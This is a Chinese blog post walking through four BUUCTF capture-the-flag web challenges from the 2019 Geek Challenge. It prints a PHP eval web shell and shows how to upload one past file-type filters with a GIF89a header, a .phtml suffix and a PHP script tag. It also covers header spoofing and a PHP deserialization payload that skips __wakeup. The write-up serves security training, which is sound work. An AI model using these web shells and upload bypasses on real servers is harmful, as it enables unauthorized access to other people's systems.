BUUCTF-web极客大挑战

最新推荐文章于 2024-06-24 16:17:13 发布
最新推荐文章于 2024-06-24 16:17:13 发布
阅读量3.6k 收藏 11
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhhb1005/article/details/124229036
版权

目录

[极客大挑战 2019]Knife

[极客大挑战 2019]Http

[极客大挑战 2019]Upload

​ 

[极客大挑战 2019]PHP

[极客大挑战 2019]Knife

eval($_POST["Syc"]);

这是一个典型的后门程序,用蚁剑链接复制url,密码则是页面中给的密码Syc。

在根目录下找到flag文件,得出flag。

 

[极客大挑战 2019]Http

打开页面后查看源代码,发现一个php文件

打开链接node4.buuoj.cn:25883/Secret.php,给出了提示,说它不是来自https://Sycsecret.buuoj.cn这个页面,所以要对referer进行修改。

 使用burp对这个页面抓包,然后加上

referer: https://Sycsecret.buuoj.cn

send

 

意思就是说需要用Syclover浏览器,也就是需要改消息头的User-Agent参数 ,将Mozilla改为Syclover就行了。

send,又出现了新的提示

 

意思是只能本地访问,所以加上

X-Forwarded-For: 127.0.0.1

 找到flag

[极客大挑战 2019]Upload

 

这道题是文件上传,先上传一个文件试一试,发现说不是图片

 

 所以使用burp抓包,对Content-Type进行修改为imaeg/gif,出现了提示

phtml文件

        在嵌入了php脚本的html中,使用 phtml作为后缀名;完全是php写的,则使用php作为后缀名。这两种文件,web服务器都会用php解释器进行解析。

将后缀修改为phtml

出现了新的提示

 

 

html实体字符

        HTML 中规定了 Character entity references,也就是通常我们说得 html实体字符,一些字符在 HTML 中拥有特殊的含义,比如小于号 (<) 用于定义 HTML 标签的开始。如果我们希望浏览器正确地显示这些字符,我们必须在 HTML 源码中插入字符实体。

        字符实体有三部分:一个和号 (&),一个实体名称,或者 # 和一个实体编号,以及一个分号 (;)。要在 HTML 文档中显示小于号,我们需要这样写:&lt; 或者 &#60。

        &#x3C;  代表:<,&#x3F;  代表:?

也就是说上传文件里不能包含:" <? "     

所以用 script标签 绕过“<?”限制:<script language='php'>@eval($_POST['cmd']);</script>

send而后出现提示,就是说这不是图片

 所以,在文件前面加文件头:GIF89a,php会检测其为gif图片。使用getimagesize函数无法判断其图片是无效的。成功上传一句话木马,然后使用蚁剑链接,而上传文件一般都在upload目录下。

所以url:http://1992c45f-fa67-4b72-9b9a-4e2ed19764a5.node4.buuoj.cn:81/upload/1.phtml

密码则是:cmd

在根目录下找到flag

 

[极客大挑战 2019]PHP

 打开页面

 备份引起了我的注意,尝试使用www.zip为后缀,得到一个压缩包。

 里面有以flag为名的文件,但是提交后是错误的

看一下index,发现了一段php代码,是反序列化

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

 而class.php却更加复杂

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

 

分析代码应该是要求我们username=admin,password=100时得到flag
但是wakeup方法会导致username成为guest,当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行,因此需要通过序列化字符串中对象的个数来绕过该方法。

所以

<?php
class Name
{
    private $username = 'admin';
    private $password = '100';
}
$a = new Name();
echo serialize($a);
#进行url编码,防止%00对应的不可打印字符在复制时丢失
echo urlencode(serialize($a));
#未编码的情况
//O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
//Name后面的2在链接中要改成3
?>

 

 加上后缀

 /index.phpselect=O%3A4%3A%22Name%22%3A3%3A{s%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B}

得出flag


 

 

S@Kura
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
微信小程序-- 极客学院
04-02
在这个“微信小程序-- 极客学院”资源中,我们可以期待学习到关于如何利用微信小程序平台进行开发的专业知识。 1. 微信小程序基础: 微信小程序的基础包括了它的架构、生命周期和API。学习者需要理解小程序的XML和...
Buuctf极客挑战练习
qq_45927819的博客
08-03 462
文章目录[极客挑战 2019]Knife 1[极客挑战 2019]Http 1[极客挑战 2019]Upload 1[极客挑战 2019]PHP 1 [极客挑战 2019]Knife 1 白给的shell 一句话木马 直接蚁剑或者菜刀连接 在根目录下得到flag [极客挑战 2019]Http 1 打开环境查看源码发现Secret.php: 访问一下: 也就是这个网页不是来自https://www.Sycsecret.com的 抓包,添加referer头,referer头就是证明你从哪
BUUCTF_极客挑战 2019
qq_45628145的博客
05-02 318
EasySQL 进入题目,是一个登陆框,首先试一下万能密码,居然就这么登陆进去了????,获得flag。 Havefun 进去之后,啥都没有,看下源码,构造cat=dog获得flag。 Secret File 进入题目,看下源码,发现这个,访问。 接着访问action.php,但是一访问闪一下就里面换到了end.php。 于是抓下包。 访问secr3t.php 根据提示访问flag.p...
BUUCTF--Web篇详细wp_buuctfweb
最新发布
2401_84301352的博客
06-24 588
php.iniInclude然后Base64解码就可以得到flag
BUUCTF[极客挑战 2019]RCE ME
qq_62078839的博客
03-11 2811
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } ...
BUUCTF[极客挑战 2019]BabySQL
rumil的博客
06-25 1920
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
BUUCTF[极客挑战 2019]Havefun
GUOGUO的博客
04-19 282
BUUCTF[极客挑战 2019]Havefun 一进去之后看到如下页面: 是猫猫晃动着尾巴,可爱~ 好了,言归正传:直接查看源代码,向下翻,看到: 那么这个题就很简单了,分析代码得知,我们传入一个cat的参数,其名为dog就可以了 构造payload: ?cat=dog 得到flag: 得到flag: ![QQ截图20220419001328](https://img-blog.csdnimg.cn/img_convert/3424b2f0b20bc90c9544339fa287987c.png)
基于Java的geekanime-backend极客动漫设计源码
05-24
本项目是基于Java的geekanime-backend极客动漫设计源码,包含256个文件,其中包括225个Java文件、23个XML文件、3个YAML文件、1个Gitignore文件、1个Dockerfile文件、1个Markdown文件、1个JSON文件和1个XLSX文件。...
勇士的奇妙大冒险之几何炼金 - 洋葱数学极客挑战赛最佳创意奖.zip
04-23
【标题解析】:“勇士的奇妙大冒险之几何炼金 - 洋葱数学极客挑战赛最佳创意奖.zip”这个标题暗示了一个与数学和几何学相关的项目或活动,可能是一个教育游戏或者教学资源。"勇士的奇妙大冒险"可能是游戏的主题,...
BUUCTF [极客挑战 2019]Havefun
m0_49025459的博客
04-11 391
题目 看看题奥。啥也没有 直接看看源代码 <html> <head> <meta charset="utf-8"> <title>一起来撸猫</title> <style> @keyframes tail { 6.6666666667% { transform: rotate(0); } 10% { transform: rotate(10deg); } 16.6666666667% .
buuctf-web极客挑战2019)
qq_47804678的博客
02-08 326
于是用bp使用post方式,注意将user=0改成user=1(意思也就是:是cuit的学生为真。一开始我还改成了“cuit's students”。一共就两个页面,就都看一下,发现还有提示:必须是cuit的学生,还得写对密码。如果不加密直接返回的话,flag.php被解析后是看不到有flag的源文件的,所以只能加密然后用在线工具再进行解密得到源文件。bp抓包发现中间302跳转时给了另一个路径secr3t.php,尝试访问,F12找到隐藏的路径.Archive_romm.php,尝试访问,
BUUCTF 之 [极客挑战 2019] Havefun(GET 传参)
qq_59607911的博客
11-02 248
通过查看源码发现这是PHP的代码,上面说如果cat=dog那么它就会输出一个echo 'Syc{cat_cat_cat_cat}';我们可以发现这个格式和flag是非常相似的,因此我们就可以去构造一个cat=dog。既然什么都做不了,就只能去试试抓包和看源代码,这一题是有源码的,只需要右击页面打开源码就行了。打开连接之后会发现一个一只猫的页面,不可以点击,什么都做不了、
BUUCTF [极客挑战 2019]BuyFlag1
lzu_lfl的博客
09-12 2151
BUUCTF [极客挑战 2019]BuyFlag1_WP
BUUCTF-Web】 [极客挑战 2019]BuyFlag
RexHa的博客
09-04 486
BUUCTF-Web】 [极客挑战 2019]BuyFlag
BUUCTF之HardSQL[极客挑战 2019]
金 帛的博客
06-06 1302
buucft记录贴
BUUCTF WEB [极客挑战 2019]Knife
Y1da的博客
04-16 229
BUUCTF WEB [极客挑战 2019]Knife 根据提示直接使用蚁剑连接 在文件根目录中找到flag文件,获得flag flag{b297ceda-a835-48bb-acf9-2a6c03f68d32}
Buuctf 极客挑战 upload
Dexret的博客
12-07 2544
打开该靶机,为一个上传图片的网站 尝试了一下上传php文件改Content-Type,.htaccess以及ini文件,都不能成功 百度了一下还有一种文件名后缀可以绕过 .phtml文件告诉网络服务器,这些文件是由服务器生成的带有动态内容的html文件,就像浏览器中的.php文件表现一样。 因此,在高效使用中,您应该体验到.phtml与.php文件没有任何区别。 这是一个文件ext,一些人用了一段时间来表示它是PHP生成的HTML。 修改shell.php为shell.phtml,内容为:
ctf 目录遍历 字典
05-14
CTF比赛中可能会出现目录遍历漏洞,可以使用字典来进行爆破,以下是一些常用的字典: 1. 相对路径字典:../、../../、../../../ 等 2. 绝对路径字典:/、//、///、/etc/、/root/ 等 3. 文件名字典:index.php、config.php、passwd、shadow 等 4. 目录名字典:admin、etc、var、usr 等 5. 扩展名字典:.jpg、.txt、.php、.bak 等 6. 特殊字符字典:%00、%2e%2e%2f、%2f%2e%2e%2f、%252e%252e%252f 等 7. 自定义字典:根据实际情况自行添加可能存在的路径、文件、目录名等。 以上字典可根据实际情况进行组合使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值